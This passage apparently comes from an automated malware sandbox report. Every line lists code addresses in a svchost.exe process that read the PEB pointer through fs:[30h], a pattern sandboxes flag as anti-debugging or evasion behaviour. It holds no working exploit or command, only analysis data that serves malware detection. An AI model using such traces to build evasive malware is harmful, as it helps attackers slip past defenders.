Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0634F mov eax, dword ptr fs:[00000030h]	2_2_03A0634F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]	2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E284 mov eax, dword ptr fs:[00000030h]	2_2_0396E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B0283 mov eax, dword ptr fs:[00000030h]	2_2_039B0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]	2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402A0 mov eax, dword ptr fs:[00000030h]	2_2_039402A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov ecx, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C62A0 mov eax, dword ptr fs:[00000030h]	2_2_039C62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393A2C3 mov eax, dword ptr fs:[00000030h]	2_2_0393A2C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039402E1 mov eax, dword ptr fs:[00000030h]	2_2_039402E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A062D6 mov eax, dword ptr fs:[00000030h]	2_2_03A062D6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392823B mov eax, dword ptr fs:[00000030h]	2_2_0392823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A250 mov eax, dword ptr fs:[00000030h]	2_2_0392A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936259 mov eax, dword ptr fs:[00000030h]	2_2_03936259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]	2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EA250 mov eax, dword ptr fs:[00000030h]	2_2_039EA250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B8243 mov eax, dword ptr fs:[00000030h]	2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B8243 mov ecx, dword ptr fs:[00000030h]	2_2_039B8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E0274 mov eax, dword ptr fs:[00000030h]	2_2_039E0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934260 mov eax, dword ptr fs:[00000030h]	2_2_03934260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392826B mov eax, dword ptr fs:[00000030h]	2_2_0392826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A0625D mov eax, dword ptr fs:[00000030h]	2_2_03A0625D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B019F mov eax, dword ptr fs:[00000030h]	2_2_039B019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A197 mov eax, dword ptr fs:[00000030h]	2_2_0392A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03970185 mov eax, dword ptr fs:[00000030h]	2_2_03970185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]	2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039EC188 mov eax, dword ptr fs:[00000030h]	2_2_039EC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]	2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D4180 mov eax, dword ptr fs:[00000030h]	2_2_039D4180
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A061E5 mov eax, dword ptr fs:[00000030h]	2_2_03A061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov ecx, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE1D0 mov eax, dword ptr fs:[00000030h]	2_2_039AE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]	2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F61C3 mov eax, dword ptr fs:[00000030h]	2_2_039F61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039601F8 mov eax, dword ptr fs:[00000030h]	2_2_039601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov ecx, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DA118 mov eax, dword ptr fs:[00000030h]	2_2_039DA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F0115 mov eax, dword ptr fs:[00000030h]	2_2_039F0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov eax, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039DE10E mov ecx, dword ptr fs:[00000030h]	2_2_039DE10E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960124 mov eax, dword ptr fs:[00000030h]	2_2_03960124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C156 mov eax, dword ptr fs:[00000030h]	2_2_0392C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C8158 mov eax, dword ptr fs:[00000030h]	2_2_039C8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]	2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03A04164 mov eax, dword ptr fs:[00000030h]	2_2_03A04164
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]	2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03936154 mov eax, dword ptr fs:[00000030h]	2_2_03936154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov ecx, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C4144 mov eax, dword ptr fs:[00000030h]	2_2_039C4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393208A mov eax, dword ptr fs:[00000030h]	2_2_0393208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F60B8 mov eax, dword ptr fs:[00000030h]	2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F60B8 mov ecx, dword ptr fs:[00000030h]	2_2_039F60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039280A0 mov eax, dword ptr fs:[00000030h]	2_2_039280A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C80A8 mov eax, dword ptr fs:[00000030h]	2_2_039C80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B20DE mov eax, dword ptr fs:[00000030h]	2_2_039B20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C0F0 mov eax, dword ptr fs:[00000030h]	2_2_0392C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039720F0 mov ecx, dword ptr fs:[00000030h]	2_2_039720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A0E3 mov ecx, dword ptr fs:[00000030h]	2_2_0392A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039380E9 mov eax, dword ptr fs:[00000030h]	2_2_039380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B60E0 mov eax, dword ptr fs:[00000030h]	2_2_039B60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E016 mov eax, dword ptr fs:[00000030h]	2_2_0394E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4000 mov ecx, dword ptr fs:[00000030h]	2_2_039B4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D2000 mov eax, dword ptr fs:[00000030h]	2_2_039D2000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039C6030 mov eax, dword ptr fs:[00000030h]	2_2_039C6030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392A020 mov eax, dword ptr fs:[00000030h]	2_2_0392A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0392C020 mov eax, dword ptr fs:[00000030h]	2_2_0392C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932050 mov eax, dword ptr fs:[00000030h]	2_2_03932050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B6050 mov eax, dword ptr fs:[00000030h]	2_2_039B6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395C073 mov eax, dword ptr fs:[00000030h]	2_2_0395C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039D678E mov eax, dword ptr fs:[00000030h]	2_2_039D678E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039307AF mov eax, dword ptr fs:[00000030h]	2_2_039307AF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039E47A0 mov eax, dword ptr fs:[00000030h]	2_2_039E47A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393C7C0 mov eax, dword ptr fs:[00000030h]	2_2_0393C7C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B07C3 mov eax, dword ptr fs:[00000030h]	2_2_039B07C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]	2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039347FB mov eax, dword ptr fs:[00000030h]	2_2_039347FB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039527ED mov eax, dword ptr fs:[00000030h]	2_2_039527ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE7E1 mov eax, dword ptr fs:[00000030h]	2_2_039BE7E1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930710 mov eax, dword ptr fs:[00000030h]	2_2_03930710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03960710 mov eax, dword ptr fs:[00000030h]	2_2_03960710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C700 mov eax, dword ptr fs:[00000030h]	2_2_0396C700
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov ecx, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396273C mov eax, dword ptr fs:[00000030h]	2_2_0396273C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AC730 mov eax, dword ptr fs:[00000030h]	2_2_039AC730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]	2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C720 mov eax, dword ptr fs:[00000030h]	2_2_0396C720
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03930750 mov eax, dword ptr fs:[00000030h]	2_2_03930750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039BE75D mov eax, dword ptr fs:[00000030h]	2_2_039BE75D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]	2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972750 mov eax, dword ptr fs:[00000030h]	2_2_03972750
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B4755 mov eax, dword ptr fs:[00000030h]	2_2_039B4755
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov esi, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396674D mov eax, dword ptr fs:[00000030h]	2_2_0396674D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03938770 mov eax, dword ptr fs:[00000030h]	2_2_03938770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03940770 mov eax, dword ptr fs:[00000030h]	2_2_03940770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]	2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03934690 mov eax, dword ptr fs:[00000030h]	2_2_03934690
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039666B0 mov eax, dword ptr fs:[00000030h]	2_2_039666B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C6A6 mov eax, dword ptr fs:[00000030h]	2_2_0396C6A6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A6C7 mov ebx, dword ptr fs:[00000030h]	2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A6C7 mov eax, dword ptr fs:[00000030h]	2_2_0396A6C7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE6F2 mov eax, dword ptr fs:[00000030h]	2_2_039AE6F2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]	2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B06F1 mov eax, dword ptr fs:[00000030h]	2_2_039B06F1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03972619 mov eax, dword ptr fs:[00000030h]	2_2_03972619
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039AE609 mov eax, dword ptr fs:[00000030h]	2_2_039AE609
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394260B mov eax, dword ptr fs:[00000030h]	2_2_0394260B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394E627 mov eax, dword ptr fs:[00000030h]	2_2_0394E627
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03966620 mov eax, dword ptr fs:[00000030h]	2_2_03966620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03968620 mov eax, dword ptr fs:[00000030h]	2_2_03968620
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0393262C mov eax, dword ptr fs:[00000030h]	2_2_0393262C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0394C640 mov eax, dword ptr fs:[00000030h]	2_2_0394C640
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03962674 mov eax, dword ptr fs:[00000030h]	2_2_03962674
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]	2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039F866E mov eax, dword ptr fs:[00000030h]	2_2_039F866E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]	2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A660 mov eax, dword ptr fs:[00000030h]	2_2_0396A660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E59C mov eax, dword ptr fs:[00000030h]	2_2_0396E59C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932582 mov eax, dword ptr fs:[00000030h]	2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03932582 mov ecx, dword ptr fs:[00000030h]	2_2_03932582
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03964588 mov eax, dword ptr fs:[00000030h]	2_2_03964588
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]	2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039545B1 mov eax, dword ptr fs:[00000030h]	2_2_039545B1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039B05A7 mov eax, dword ptr fs:[00000030h]	2_2_039B05A7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039365D0 mov eax, dword ptr fs:[00000030h]	2_2_039365D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396A5D0 mov eax, dword ptr fs:[00000030h]	2_2_0396A5D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]	2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396E5CF mov eax, dword ptr fs:[00000030h]	2_2_0396E5CF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0395E5E7 mov eax, dword ptr fs:[00000030h]	2_2_0395E5E7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_039325E0 mov eax, dword ptr fs:[00000030h]	2_2_039325E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]	2_2_0396C5ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0396C5ED mov eax, dword ptr fs:[00000030h]	2_2_0396C5ED
